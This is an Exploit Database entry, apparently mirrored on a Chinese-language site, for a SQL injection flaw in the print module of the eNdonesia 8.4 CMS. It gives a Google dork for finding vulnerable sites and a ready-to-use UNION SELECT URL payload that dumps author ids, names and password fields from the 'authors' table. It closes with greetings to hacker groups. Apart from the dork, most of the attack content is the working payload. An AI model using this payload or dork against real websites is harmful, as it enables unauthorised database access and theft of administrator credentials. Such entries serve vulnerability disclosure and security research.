eNdonesia 8.4 – SQL Injection

• Exploit Database
• 37 阅读

• 作者： vYc0d
  日期： 2010-09-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15006/

• ======================================================================/
   eNdonesia 8.4 (Print Module) SQL Injection Vulnerability
   
   Download : http://sourceforge.net/projects/endonesia/files/eNdonesia
   Version: 8.4 or lower maybe also affected
   Dork : mod.php?mod=publisher&op=printarticle&artid=
  
  ======================================================================/
   
   Author: vYc0d
   Contact : vyc0d@hackermail.com
   Site: http://vyc0d.uni.cc
   Date: 15-10-2010
  
  ==============================================================================================/
  
  [Vulnerability File]
  
  http://localhost/[eNdonesia 8.4]/mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i]
  
  
  [ DEMO ]
   
  http://www.site.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--
   
  ===================================================================================================================================================/
   
  [ Thanks to ]
   
  [-] Allah SWT, Muhammad SAW, My Family
  [-] The big Family of :
  [-] M0slem Hax0r - Echo - Indonesian Coder - Jasakom - Indonesian Hackers - Malang Cyber Crew 
  [-] ManadoCoding - Devilzc0de - Yogyacarderlink - Xcode - Hacker Newbie - Persiland Security
  [-] Klix ITN Malang - Kolam (Komunitas Linux Arek Malang)